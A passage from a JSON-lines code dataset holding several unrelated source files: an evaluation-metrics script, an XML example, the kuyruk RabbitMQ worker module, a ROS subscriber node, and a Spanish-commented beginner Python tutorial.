TP/(TP+FN) # Sp=Rec\n Sp = TN/(TN+FP)\n Acc = (TN+TP)/(TN+TP+FN+FP)\n Pre = TP/(TP+FP)\n F1 = 2*(Pre*Sn)/(Pre+Sn)\n Mcc = (TP*TN-FP*FN)/np.sqrt((TP+FN)*(TP+FP)*(TN+FN)*(TN+FP))\n return Sp,Sn,Acc,Pre,F1,Mcc\n\ndef test(pred,a,msg):\n fpr,tpr,rocth = roc_curve(ldi,pred)\n Sp,Sn,Acc,Pre,F1,Mcc = binarymetrics(count(fpr,tpr,a))\n print('& {} & {:.4f} & {:.4f} & {:.4f} & {:.4f} & {:.4f} \\\\\\\\'.format(msg,Sn,Acc,Pre,F1,Mcc))\n\ntest(y1,0.05,'IMCMDA')\ntest(y2,0.05,'SPM')\ntest(y3,0.05,'NIMCGCN')\ntest(y4,0.05,'MCLPMDA')\ntest(y5,0.05,'GAEMDA')\ntest(y6,0.05,'NIMGSA')\ntest(y1,0.01,'IMCMDA')\ntest(y2,0.01,'SPM')\ntest(y3,0.01,'NIMCGCN')\ntest(y4,0.01,'MCLPMDA')\ntest(y5,0.01,'GAEMDA')\ntest(y6,0.01,'NIMGSA')","repo_name":"zhanglabNKU/NIMGSA","sub_path":"evaluation/binarymetric.py","file_name":"binarymetric.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"32413012428","text":"from xml.etree.ElementTree import Element, SubElement, dump, ElementTree, parse\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n\nnote = Element(\"note\")\nnote.attrib[\"date\"] = \"20180108\"\nnote.attrib[\"editor\"] = \"pycharm\"\n\nto = Element(\"to\")\nto.text = \"Tove\"\nnote.append(to)\n\nSubElement(note,\"to\").text = \"김기정\"\nSubElement(note,\"to\").text = \"김인한\"\nSubElement(note,\"to\").text = \"김상엽\"\n\nSubElement(note, \"from\").text = \"Jani\"\n\nSubElement(note, \"heading\").text = \"Reminder\"\nSubElement(note, \"body\").text = \"Don't forget me this weekend!\"\n\nindent(note)\ndump(note)\nElementTree(note).write(\"note.xml\")\n\ntree = parse(\"note.xml\")\nnote = tree.getroot()\n\n# print(note.get(\"date\")) ## date 호출\n# print(note.get(\"foo\", \"default\")) ## \"foo\"가 없으면 \"default\" 출력\n ## print(note.get(\"foo\")) -> \"foo\"가 없으면 None 출력\nprint(note.keys()) ## 속성 호출\n# print(note.items()) ## (키-값) 쌍 호출\n\n# from_tag = note.find(\"from\")\n# print(from_tag)\n# from_text = note.findtext(\"from\")\n# print(from_text)\n# from_tags = note.findall(\"from\")\n# print(from_tags)\n\nto_tag = note.find(\"to\")\nprint(to_tag.text)\nto_tags = note.findall(\"to\")\n\nfor to_element in to_tags:\n print(to_element.text)\n # print(to_element) ## to_element 로만 적어주면 주소를 출력하는!!\n#\n# print(\"Search from Root\")\n# for parent in note.getiterator():\n# for child in parent:\n# print(child.text)\n#\n# print(\"Search from from\")\n# for child in note.getiterator(\"from\"):\n# print(child.text)\n#\n# print(\"end\")","repo_name":"superbeom97/jumpjump","sub_path":"03_Data_Science/1_Collection/XML/0Basic_XML.py","file_name":"0Basic_XML.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24025968958","text":"import os\nimport sys\nimport json\nimport platform\nimport socket\nimport signal\nimport logging\nimport logging.config\nimport threading\nimport traceback\nimport argparse\nimport multiprocessing\nfrom time import monotonic\nfrom typing import Dict, Any, List, Tuple, Optional, Type, cast # noqa\n\nimport amqp\n\nfrom kuyruk import importer, signals\nfrom kuyruk.kuyruk import Kuyruk\nfrom kuyruk.task import Task\nfrom kuyruk.heartbeat import Heartbeat\nfrom kuyruk.exceptions import Reject, Discard, HeartbeatError, ExcInfoType\n\nlogger = logging.getLogger(__name__)\n\n\nclass Worker:\n \"\"\"Consumes tasks from queues and runs them.\n\n :param app: An instance of :class:`~kuyruk.Kuyruk`\n :param args: Command line arguments\n\n \"\"\"\n def __init__(self, app: Kuyruk, args: argparse.Namespace) -> None:\n self.kuyruk = app\n\n if not args.queues:\n args.queues = ['kuyruk']\n\n def add_host(queue: str) -> str:\n if queue.endswith('.localhost'):\n queue = queue.rsplit('.localhost')[0]\n return \"%s.%s\" % (queue, self._hostname)\n else:\n return queue\n\n self._hostname = socket.gethostname()\n self.queues = [add_host(q) for q in args.queues]\n self._tasks = {} # type: Dict[Tuple[str, str], Task]\n self.shutdown_pending = threading.Event()\n self.consuming = False\n self.current_task = None # type: Optional[Task]\n self.current_args = None # type: Optional[Tuple]\n self.current_kwargs = None # type: Optional[Dict[str, Any]]\n self._heartbeat_error: Optional[Exception]\n\n self._started_at = None # type: Optional[float]\n self._pid = os.getpid()\n\n self._logging_level = app.config.WORKER_LOGGING_LEVEL\n if args.logging_level is not None:\n self._logging_level = args.logging_level\n\n self._max_run_time = app.config.WORKER_MAX_RUN_TIME\n if args.max_run_time is not None:\n self._max_run_time = args.max_run_time\n\n self._max_load = app.config.WORKER_MAX_LOAD\n if args.max_load is not None:\n self._max_load = args.max_load\n if self._max_load == -1:\n self._max_load == multiprocessing.cpu_count()\n\n self._reconnect_interval = app.config.WORKER_RECONNECT_INTERVAL\n\n self._threads = [] # type: List[threading.Thread]\n if self._max_load:\n self._threads.append(threading.Thread(target=self._watch_load))\n if self._max_run_time:\n self._threads.append(threading.Thread(target=self._shutdown_timer))\n\n signals.worker_init.send(self.kuyruk, worker=self)\n\n def run(self) -> None:\n \"\"\"Runs the worker and consumes messages from RabbitMQ.\n Returns only after `shutdown()` is called.\n\n \"\"\"\n if self._logging_level:\n logging.basicConfig(\n level=getattr(logging, self._logging_level.upper()),\n format=\"%(levelname).1s %(name)s.%(funcName)s:%(lineno)d - %(message)s\")\n\n signal.signal(signal.SIGINT, self._handle_sigint)\n signal.signal(signal.SIGTERM, self._handle_sigterm)\n if platform.system() != 'Windows':\n # These features will not be available on Windows, but that is OK.\n # Read this issue for more details:\n # https://github.com/cenkalti/kuyruk/issues/54\n signal.signal(signal.SIGHUP, self._handle_sighup)\n signal.signal(signal.SIGUSR1, self._handle_sigusr1)\n signal.signal(signal.SIGUSR2, self._handle_sigusr2)\n\n self._started_at = os.times().elapsed\n\n for t in self._threads:\n t.start()\n\n try:\n signals.worker_start.send(self.kuyruk, worker=self)\n while not self.shutdown_pending.is_set():\n try:\n self._consume_messages()\n break\n except HeartbeatError:\n logger.error(\"Heartbeat error\")\n except (ConnectionError, amqp.exceptions.ConnectionError) as e:\n logger.error(\"Connection error: %s\", e)\n traceback.print_exc()\n\n logger.info(\"Waiting %d seconds before reconnecting...\", self._reconnect_interval)\n self.shutdown_pending.wait(self._reconnect_interval)\n finally:\n self.shutdown_pending.set()\n for t in self._threads:\n t.join()\n\n signals.worker_shutdown.send(self.kuyruk, worker=self)\n\n logger.debug(\"End run worker\")\n\n def _consume_messages(self) -> None:\n with self.kuyruk.channel() as ch:\n # Set prefetch count to 1. If we don't set this, RabbitMQ keeps\n # sending messages while we are already working on a message.\n ch.basic_qos(0, 1, False)\n\n self._declare_queues(ch)\n self._consume_queues(ch)\n logger.info('Consumer started')\n self._main_loop(ch)\n\n def _main_loop(self, ch: amqp.Channel) -> None:\n while not self.shutdown_pending.is_set():\n self._pause_or_resume(ch)\n ch.connection.heartbeat_tick()\n try:\n ch.connection.drain_events(timeout=1)\n except socket.timeout:\n pass\n\n def _consumer_tag(self, queue: str) -> str:\n return \"%s:%s@%s\" % (queue, self._pid, self._hostname)\n\n def _declare_queues(self, ch: amqp.Channel) -> None:\n for queue in self.queues:\n logger.debug(\"queue_declare: %s\", queue)\n ch.queue_declare(queue=queue, durable=True, auto_delete=False)\n\n def _pause_or_resume(self, channel: amqp.Channel) -> None:\n if not self._max_load:\n return\n\n try:\n load = self._current_load\n except AttributeError:\n should_pause = False\n else:\n should_pause = load > self._max_load\n\n if should_pause and self.consuming:\n logger.warning('Load is above the treshold (%.2f/%s), ' 'pausing consumer', load, self._max_load)\n self._cancel_queues(channel)\n elif not should_pause and not self.consuming:\n logger.warning('Load is below the treshold (%.2f/%s), ' 'resuming consumer', load, self._max_load)\n self._consume_queues(channel)\n\n def _consume_queues(self, ch: amqp.Channel) -> None:\n self.consuming = True\n for queue in self.queues:\n logger.debug(\"basic_consume: %s\", queue)\n ch.basic_consume(queue=queue, consumer_tag=self._consumer_tag(queue), callback=self._process_message)\n\n def _cancel_queues(self, ch: amqp.Channel) -> None:\n self.consuming = False\n for queue in self.queues:\n logger.debug(\"basic_cancel: %s\", queue)\n ch.basic_cancel(self._consumer_tag(queue))\n\n def _process_message(self, message: amqp.Message) -> None:\n \"\"\"Processes the message received from the queue.\"\"\"\n if self.shutdown_pending.is_set():\n return\n\n try:\n if isinstance(message.body, bytes):\n message.body = message.body.decode()\n description = json.loads(message.body)\n except Exception:\n logger.error(\"Cannot decode message. Dropping. Message: %r\", message.body)\n traceback.print_exc()\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n else:\n logger.info(\"Processing task: %r\", description)\n self._process_description(message, description)\n\n def _process_description(self, message: amqp.Message, description: Dict[str, Any]) -> None:\n try:\n task = self._import_task(description['module'], description['function'])\n args, kwargs = description['args'], description['kwargs']\n except Exception:\n logger.error('Cannot import task')\n exc_info = sys.exc_info()\n signals.worker_failure.send(self.kuyruk, description=description, exc_info=exc_info, worker=self)\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n else:\n self._process_task(message, description, task, args, kwargs)\n\n def _import_task(self, module: str, function: str) -> Task:\n if (module, function) in self._tasks:\n return self._tasks[(module, function)]\n\n task = importer.import_object(module, function)\n self._tasks[(module, function)] = task\n return task\n\n def _process_task(\n self,\n message: amqp.Message,\n description: Dict[str, Any],\n task: Task,\n args: Tuple,\n kwargs: Dict[str, Any],\n ) -> None:\n queue = message.delivery_info['routing_key']\n reply_to = message.properties.get('reply_to')\n try:\n result = self._run_task(message.channel.connection, task, args, kwargs)\n except Reject:\n logger.warning('Task is rejected')\n message.channel.basic_reject(message.delivery_tag, requeue=True)\n except Discard:\n logger.warning('Task is discarded')\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n if reply_to:\n exc_info = sys.exc_info()\n self._send_reply(reply_to, message.channel, None, exc_info)\n except HeartbeatError:\n exc_info = sys.exc_info()\n logger.error('Heartbeat error:\\n%s', ''.join(traceback.format_exception(*exc_info)))\n signals.worker_failure.send(\n self.kuyruk,\n description=description,\n task=task,\n args=args,\n kwargs=kwargs,\n exc_info=exc_info,\n worker=self,\n queue=queue)\n raise\n except Exception:\n exc_info = sys.exc_info()\n logger.error('Task raised an exception:\\n%s', ''.join(traceback.format_exception(*exc_info)))\n signals.worker_failure.send(\n self.kuyruk,\n description=description,\n task=task,\n args=args,\n kwargs=kwargs,\n exc_info=exc_info,\n worker=self,\n queue=queue)\n message.channel.basic_reject(message.delivery_tag, requeue=False)\n if reply_to:\n self._send_reply(reply_to, message.channel, None, exc_info)\n else:\n logger.info('Task is successful')\n message.channel.basic_ack(message.delivery_tag)\n if reply_to:\n self._send_reply(reply_to, message.channel, result, None)\n finally:\n logger.debug(\"Task is processed\")\n\n def _run_task(self, connection: amqp.Connection, task: Task, args: Tuple, kwargs: Dict[str, Any]) -> Any:\n hb = Heartbeat(connection, self._on_heartbeat_error)\n hb.start()\n\n self.current_task = task\n self.current_args = args\n self.current_kwargs = kwargs\n try:\n return self._apply_task(task, args, kwargs)\n finally:\n self.current_task = None\n self.current_args = None\n self.current_kwargs = None\n\n hb.stop()\n\n def _on_heartbeat_error(self, error: Exception) -> None:\n self._heartbeat_error = error\n os.kill(os.getpid(), signal.SIGHUP)\n\n @staticmethod\n def _apply_task(task: Task, args: Tuple, kwargs: Dict[str, Any]) -> Any:\n \"\"\"Logs the time spent while running the task.\"\"\"\n if args is None:\n args = ()\n if kwargs is None:\n kwargs = {}\n\n start = monotonic()\n try:\n return task.apply(*args, **kwargs)\n finally:\n delta = monotonic() - start\n logger.info(\"%s finished in %i seconds.\" % (task.name, delta))\n\n def _send_reply(\n self,\n reply_to: str,\n channel: amqp.Channel,\n result: Any,\n exc_info: Optional[ExcInfoType],\n ) -> None:\n logger.debug(\"Sending reply result=%r\", result)\n\n reply = {'result': result}\n if exc_info:\n reply['exception'] = self._exc_info_dict(exc_info)\n\n try:\n body = json.dumps(reply)\n except Exception as e:\n logger.error('Cannot serialize result as JSON: %s', e)\n exc_info = sys.exc_info()\n reply = {'result': None, 'exception': self._exc_info_dict(exc_info)}\n body = json.dumps(reply)\n\n msg = amqp.Message(body=body)\n channel.basic_publish(msg, exchange=\"\", routing_key=reply_to)\n\n @staticmethod\n def _exc_info_dict(exc_info: ExcInfoType) -> Dict[str, str]:\n type_, val, tb = exc_info\n return {\n 'type': '%s.%s' % (type_.__module__, cast(Type[BaseException], type_).__name__),\n 'value': str(val),\n 'traceback': ''.join(traceback.format_tb(tb)),\n }\n\n def _watch_load(self) -> None:\n \"\"\"Pause consuming messages if lood goes above the allowed limit.\"\"\"\n while not self.shutdown_pending.wait(1):\n self._current_load = os.getloadavg()[0]\n\n @property\n def uptime(self) -> float:\n if not self._started_at:\n return 0\n\n return os.times().elapsed - self._started_at\n\n def _shutdown_timer(self) -> None:\n \"\"\"Counts down from MAX_WORKER_RUN_TIME. When it reaches zero sutdown\n gracefully.\n\n \"\"\"\n remaining = cast(float, self._max_run_time) - self.uptime\n if not self.shutdown_pending.wait(remaining):\n logger.warning('Run time reached zero')\n self.shutdown()\n\n def shutdown(self) -> None:\n \"\"\"Exits after the current task is finished.\"\"\"\n logger.warning(\"Shutdown requested\")\n self.shutdown_pending.set()\n\n def _handle_sigint(self, signum: int, frame: Any) -> None:\n \"\"\"Shutdown after processing current task.\"\"\"\n logger.warning(\"Catched SIGINT\")\n self.shutdown()\n\n def _handle_sigterm(self, signum: int, frame: Any) -> None:\n \"\"\"Shutdown after processing current task.\"\"\"\n logger.warning(\"Catched SIGTERM\")\n self.shutdown()\n\n def _handle_sighup(self, signum: int, frame: Any) -> None:\n \"\"\"Used internally to fail the task when connection to RabbitMQ is\n lost during the execution of the task.\n\n \"\"\"\n logger.debug(\"Catched SIGHUP\")\n error = self._heartbeat_error\n self._heartbeat_error = None\n raise HeartbeatError from error\n\n @staticmethod\n def _handle_sigusr1(signum: int, frame: Any) -> None:\n \"\"\"Print stacktrace.\"\"\"\n print('=' * 70)\n print(''.join(traceback.format_stack()))\n print('-' * 70)\n\n def _handle_sigusr2(self, signum: int, frame: Any) -> None:\n \"\"\"Drop current task.\"\"\"\n logger.warning(\"Catched SIGUSR2\")\n if self.current_task:\n logger.warning(\"Dropping current task...\")\n raise Discard\n\n def drop_task(self) -> None:\n os.kill(os.getpid(), signal.SIGUSR2)\n","repo_name":"cenkalti/kuyruk","sub_path":"kuyruk/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":15126,"program_lang":"python","lang":"en","doc_type":"code","stars":229,"dataset":"github-code","pt":"99"} +{"seq_id":"18959649897","text":"#!/usr/bin/env python\nimport rospy\nfrom random import *\nfrom std_msgs.msg import String\nfrom rogerleo_hw2.msg import id_and_point \n\n\ndef callback(data):\n #def __init__(self):\n #rospy.loginfo(str(data.id) + \" at position\")\n #rospy.loginfo( \" x = \" +str(data.points.x))\n #rospy.loginfo( \" y = \" +str(data.points.y))\n #rospy.loginfo( \" z = \" +str(data.points.z))\n print(str(data.id) + \" at position\")\n print( \" x = \" +str(data.points.x))\n print( \" y = \" +str(data.points.y))\n print( \" z = \" +str(data.points.z))\n\n #rospy.get_caller_id() +\ndef node_3():\n rospy.init_node('node_3', anonymous=True)\n rospy.Subscriber(\"registered_obstacles\", id_and_point, callback)\n\n rospy.spin()\n\nif __name__ == '__main__':\n node_3()\n","repo_name":"amiriqbal4/Fundamentals_of_AutonomousRobotics_2019","sub_path":"rogerleo_hw2/src/node_3.py","file_name":"node_3.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29296913708","text":"#!/usr/bin/env python3\n'''breve intoduccion a la programacion por procedimientos'''\n\n# importar modulo\n\nimport sys\n\nprint ('VERSION en uso de PYTHON\\n')\n\nprint (sys.version, '\\n')\n\nprint ('¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬\\n')\n\nvalor = 125.66 # asigna numero con decimales -float-\n\nprint (int (valor), '\\n') # presenta el valor como numero entero sin decimales con int\n\ncadena = 'esto es una cadena\\n' # asigna una cadena con salto de linea\n\nprint (cadena) # presenta la cadena\n\nprint ('elemento de una cadena ; cadena [0] ',cadena [0], '\\n') # presenta el elemento de la posicion indicada de la cadena\n\nprint ('subcadena de la cadena ; cadena [0 : 4] ',cadena [0 : 4], '\\n') # presenta el tramo entre las posiciones 0 a 4 -4 NO incluido-\n\nprint ('convertir un valor en una cadena ; str (valor) ', str (valor), '\\n') # presenta el valor convertido en una cadena\n\nvalorCadena = '125' # asigna cadena -entero-\n\nprint ('convertir la cadena en un valor con decimales ; float (valorCadena) ',float (valorCadena), '\\n') # presenta la cadena convertida a un valor con decimales con float\n\nprint ('presentar contenidos variables ; valor,cadena,valorCadena ',valor,cadena,valorCadena, '\\n') # presenta el contenido de las variables\n\nprint ('tipo variable ; type (valor) ',type (valor), '\\n') # presenta el tipo de valor de la variable con type\n\nprint ('tipo variable ; type (cadena) ',type (cadena), '\\n') # presenta el tipo de valor de la variable con type\n\nprint ('tipo variable ; type (valorCadena) ',type (valorCadena), '\\n') # presenta el tipo de valor de la variable con type\n\nprint ('tipo valor ; type (1000) ',type (1000), '\\n') # presenta el tipo de valor con type\n\nprint ('tipo valor ; type (.10) ',type (.10), '\\n') # presenta el tipo de valor con type\n\nprint ('tipo valor ; type (\"1000\") ',type (\"1000\"), '\\n') # presenta el tipo de valor con type\n\ntupla = ('cadena',100, .9, '200') # tupla -valores inmutables , NO se pueden cambiar-\n\nlista = ['cadena',100, .9, '200'] # lista -valores mutables , SE pueden cambiar-\n\nprint ('tipo tupla , type (tupla) ', type (tupla), '\\n') # presenta el tipo de la referencia\n\nprint ('tipo tupla , type (lista) ', type (lista), '\\n') # presenta el tipo de la referencia\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (tupla)',len (tupla), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (lista)',len (lista), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (cadena)',len (cadena), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (valorCadena)',len (valorCadena), '\\n' )\n\nprint ('len () devuelve el numero de elementos de una secuencia ; len (\"numero de elementos de esta cadena\")',len (\"numero de elementos de esta cadena\"), '\\n' )\n\nprint ('añadir elementos a una lista ; lista.append (\"penultimo elemento\")\\n')\n\nlista.append (\"penultimo elemento\") # añade la cadena al final dde la lista\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('añadir elementos a la lista mediante tipos ; list.append (lista,\"ultimo elemento\")\\n')\n\nlist.append (lista,\"ultimo elemento\") # añade el elemento a la lista usando el tipo de dato\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('insertar un elemento en la posicion indicada de lista ; lista.insert (1,\"uno\")\\n')\n\nlista.insert (1,\"uno\") # inserta en la posicion indicada la cadena indicada\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('presentar el elemento de la posicion 1 de lista ; lista [1] ',lista [1], '\\n') # presenta el valor de la posicion indicada \n\nprint ('eliminar un elemento de la lista con remove ; lista.remove (\"cadena\")\\n')\n\nlista.remove (\"cadena\") # elimina el elemento indicado de la lista\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nprint ('presentar el elemento de un posicion indicada en una tupla ; tupla [1] ',tupla [1], '\\n') # presenta el elemento de la tupla indicado en la posicion\n\nprint ('cambiar el elemento de una posicion de la lista ; lista [1] = \"CIEN\"\\n')\n\nlista [1] = \"CIEN\" # cambia el elemento de la posicion indicada por el indicado\n\nprint ('contenido de lista ', lista, '\\n') # presenta el contenido de la lista\n\nLista = ['cadena',100, .9, '200'] # lista -valores mutables , SE pueden cambiar- \n\nLISTA = ['cadena',100, .9, '200'] # lista -valores mutables , SE pueden cambiar- \n\nprint ('contenido de Lista ', Lista, '\\n') # presenta el contenido de la lista\n\nprint ('contenido de LISTA ', LISTA, '\\n') # presenta el contenido de la lista\n\nprint ('comparar si dos objetos son el mismo ; Lista is LISTA ',Lista is LISTA, '\\n') # presenta False al no ser la misma lista\n\nprint ('asignar el mismo objeto a LISTA ; LISTA = Lista\\n')\n\nLISTA = Lista # asigna el bjeto indicado\n\nprint ('comparar si dos objetos son el mismo ; Lista is LISTA ',Lista is LISTA, '\\n') # presenta True al ser la misma lista\n\ncualquiera = 'cualquiera' # asigna cadena\n\nnulo = None # asigna valor nulo\n\nprint ('contenido de cualquiera ', cualquiera, '\\n') # presenta el contenido de la variable\n\nprint ('contenido de nulo ', nulo, '\\n') # presenta el contenido de la variable\n\nprint ('comprobar si el contenido es del objeto -variable- ; cualquiera is \"cualquiera\" ',cualquiera is \"cualquiera\", '\\n' ) # presenta True al ser el contenido\n\nprint ('comprobar si el contenido es del objeto -variable- ; nulo is None ',nulo is None, '\\n' ) # presenta True al ser el contenido\n\nprint ('comprobar si el contenido es del objeto -variable- ; cualquiera is not None ',cualquiera is not None, '\\n' ) # presenta True al NO ser el contenido\n\nprint ('comprobar si el contenido es del objeto -variable- ; nulo is not None ',nulo is not None, '\\n' ) # presenta False al ser el contenido\n\nCUALQUIERA = \"cualquiera\" # asigna cadena\n\nprint ('contenido de CUALQUIERA ', CUALQUIERA, '\\n') # presenta el contenido de la variable\n\nprint ('comparar si los dos objetos son los mismo ; cualquiera is CUALQUIERA ',cualquiera is CUALQUIERA, '\\n' ) # presenta True al ser el mismo objeto \n\ncero = 0 # asigna valor entero\n\nuno = 1 # asigna valor entero\n\nseis = 6 # asigna valor entero\n\nprint ('contenido de cero ', cero, '\\n') # presenta el contenido de la variable\n\nprint ('contenido de uno ', uno, '\\n') # presenta el contenido de la variable\n\nprint ('contenido de seis ', seis, '\\n') # presenta el contenido de la variable\n\nprint ('cero mayor que uno ; cero > uno ',cero > uno, '\\n' ) # presenta False al NO serlo \n\nprint ('seis menor que uno ; seis < uno ',seis < uno, '\\n' ) # presenta False al NO serlo\n\nprint ('seis menor o igual que uno ; seis <= uno ',seis <= uno, '\\n' ) # presenta False al NO serlo\n\nprint ('seis mayor o igual que uno ; seis >= uno ',seis >= uno, '\\n' ) # presenta True al ser mayor\n\nprint ('seis igual que uno ; seis == uno ',seis == uno, '\\n' ) # presenta False al NO serlo\n\nprint ('seis igual seis ; seis == seis ',seis == seis, '\\n' ) # presenta True al ser iguales\n\nprint ('comprobar si un elemento pertenece a una secuencia -lista- ; 100 in LISTA ',100 in LISTA, '\\n' ) # presenta True al pertenecer a la lista\n\nprint ('comprobar si un elemento pertenece a una secuencia -lista- ; 1 in LISTA ',1 in LISTA, '\\n' ) # presenta False al NO pertenecer a la lista\n\nprint ('comprobar si un elemento pertenece a una secuencia -cadena- ; \"a\" in cualquiera ',\"a\" in cualquiera, '\\n' ) # presenta True al pertenecer a la cadena\n\nprint ('comprobar si un elemento pertenece a una secuencia -cadena- ; \"1\" in cualquiera ',\"1\" in cualquiera, '\\n' ) # presenta False al NO pertenecer a la cadena\n\nprint ('comprobar si un elemento NO pertenece a una secuencia -cadena- ; \"a\" not in cualquiera ',\"a\" not in cualquiera, '\\n' ) # presenta False al pertenecer a la cadena\n\nprint ('comprobar si un elemento pertenece a una secuencia -cadena- ; \"1\" not in cualquiera ',\"1\" not in cualquiera, '\\n' ) # presenta True al NO pertenecer a la cadena\n\nprint ('comprobar si un elemento NO pertenece a una secuencia -lista- ; 100 not in LISTA ',100 not in LISTA, '\\n' ) # presenta False al pertenecer a la lista\n\nprint ('comprobar si un elemento NO pertenece a una secuencia -lista- ; 1 not in LISTA ',1 not in LISTA, '\\n' ) # presenta True al NO pertenecer a la lista\n\nprint ('comparacion logica -uso de and- ; cero and uno ',cero and uno, '\\n' ) # presenta el valor menor ; 0 -si los dos valores son True-\n\nprint ('comparacion logica -uso de and- ; seis and uno ',seis and uno, '\\n' ) # presenta el valor menor ; 1 -si los dos valores son True-\n\nprint ('comparacion logica -uso de and- ; seis and seis ',seis and seis, '\\n' ) # presenta el valor menor ; 6 -si los dos valores son True-\n\nprint ('comparacion logica -uso de or- ; cero or uno ',cero or uno, '\\n' ) # presenta el valor mayor ; 0 -si uno de los valores es True-\n\nprint ('comparacion logica -uso de or- ; seis or uno ',seis or uno, '\\n' ) # presenta el valor mayor ; 1 -si uno de los valores es True-\n\nprint ('comparacion logica -uso de or- ; seis or seis ',seis or seis, '\\n' ) # presenta el valor mayor ; 6 -si uno de los valores es True-\n\nprint ('comparacion logica -uso de not- ; not cero ', not cero , '\\n' ) # presenta True ; not (negacion) -False tiene valor cero y True tiene valor 1-\n\nprint ('comparacion logica -uso de not- ; not (seis and uno) ',not (seis and uno), '\\n' ) # presenta False ; not (negacion) -si los dos valores son True-\n\nprint ('comparacion logica -uso de not- ; not (seis or uno) ',not (seis or uno), '\\n' ) # presenta False ; not (negacion) -si uno de los valores es True-\n\ntuplaVacia = () # asigna tupla vacia\n\nlistaVacia = [] # asigna lista vacia\n\ncadenaVacia = \"\" # asigna cadena vacia\n\nfalso = 0 # asigna valor int\n\nverdadero = 1 # asigna valor int \n\nprint ('contenido de tuplaVacia ', tuplaVacia, '\\n') # presenta el contenido\n\nprint ('contenido de listaVacia ', listaVacia, '\\n') # presenta el contenido\n\nprint ('contenido de cadenaVacia ', cadenaVacia, '\\n') # presenta el contenido\n\nprint ('contenido de falso ', falso, '\\n') # presenta el contenido\n\nprint ('contenido de verdadero ', verdadero, '\\n') # presenta el contenido\n\nprint ('uso de if -condicion- :\\n')\n\nif tuplaVacia : # condicion , verdadero -True-\n print ('NO es una tupla vacia ', tuplaVacia, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA TUPLA VACIA ', tuplaVacia, '\\n') # presenta el texto y su valor\n\nif listaVacia : # condicion , verdadero -True-\n print ('NO es una lista vacia ', listaVacia, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA LISTA VACIA ', listaVacia, '\\n') # presenta el texto y su valor\n\nif cadenaVacia : # condicion , verdadero -True-\n print ('NO es una cadena vacia ', cadenaVacia, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA CADENA VACIA ', cadenaVacia, '\\n') # presenta el texto y su valor\n\nif falso : # condicion , verdadero -True-\n print ('NO es False ', falso, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES False ', falso, '\\n') # presenta el texto y su valor\n\nif verdadero : # condicion , verdadero -True-\n print ('ES True ', verdadero, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('NO ES True ', verdadero, '\\n') # presenta el texto y su valor\n\nif tupla : # condicion , verdadero -True-\n print ('NO es una tupla vacia ', tupla, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA TUPLA VACIA ', tupla, '\\n') # presenta el texto y su valor\n\nif lista : # condicion , verdadero -True-\n print ('NO es una lista vacia ', lista, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA LISTA VACIA ', lista, '\\n') # presenta el texto y su valor\n\nif cadena : # condicion , verdadero -True-\n print ('NO es una cadena vacia ', cadena, '\\n') # presenta el texto y su valor\nelse : # falso -False-\n print ('ES UNA CADENA VACIA ', cadena, '\\n') # presenta el texto y su valor\n\nif seis == 0 : # condicion , verdadero -True- \n print ('-version if- el valor de seis es : ', seis, '\\n') # presenta el texto y su valor\nelif seis == 6 : # 2ª condicion , verdadero -True-\n print ('-version elif- el valor de seis es : ', seis, '\\n') # presenta el texto y su valor\nelse : # si no se cumplen una de las dos condiciones -if,elif- \n print ('-version else- el valor de seis es : ', seis, '\\n') # presenta el texto y su valor \n\nprint ('bucle mientras se cumpla una condicion ; while\\n')\n\nindice = 0 # asigna valor int -uso en while-\n\nwhile True : # bucle while continuo \n print ('ELEMENTO de lista ',lista [indice], '\\n') # presenta el texto y su valor -elemento de la lista-\n indice += 1 # suma uno al valor actual\n if indice == len (lista) : # condicion , si el valor de indice es mayor al numero de elementos de lista\n print ('-- FIN DE LA LISTA --\\n') # presenta el texto\n break # interrumpe el bucle \n\nposicion = 0 # asigna valor int -uso en while-\n\nwhile posicion <= len (lista) - 1 : # bucle while , condicion ; mientras el valor de posicion sea menor o igual al numero de elementos de la lista restandole uno \n print ('ELEMENTO de lista ',lista [posicion], '\\n') # presenta el texto y su valor -elemento de la lista-\n posicion += 1 # suma uno al valor actual\nelse : # cuando finalice el bucle \n print ('-- FIN DE LA LISTA --\\n') # presenta el texto\n\nprint ('iterar una secuencia mediante for in \\n')\n\nfor Elemento in LISTA : # iterador , bucle for in , pasa los elementos de la lista a la variable ; 